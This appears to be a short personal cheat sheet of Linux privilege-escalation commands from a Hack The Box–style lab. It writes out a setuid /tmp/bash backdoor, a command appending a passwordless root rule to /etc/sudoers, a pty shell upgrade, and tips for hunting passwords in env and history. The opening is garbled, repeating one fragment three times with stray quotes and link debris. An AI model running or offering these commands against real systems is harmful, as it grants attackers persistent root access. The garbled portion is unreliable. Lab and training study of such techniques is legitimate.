runme.sh (making a /tmp/bash to run with -p) # casual privesc #another way if we can't edit files echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh (making everything with no pass to su to sudo) "> runme.sh (making a /tmp/bash to run with -p) # casual privesc #another way if we can't edit files echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh (making everything with no pass to su to sudo) "> runme.sh (making a /tmp/bash to run with -p) # casual privesc #another way if we can't edit files echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh (making everything with no pass to su to sudo) ">
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > [runme.sh](<http://runme.sh/>) (making a /tmp/bash to run with -p) # casual privesc

#another way if we can't edit files
echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > [root.sh](<http://root.sh/>) (making everything with no pass to su to sudo) 

Linux exploit suggester

Linrpivcheck (python) (linuxprivchecker -w -o linuxprivchecker.log)


env (search for password and if we are in a container, we need to get out)

history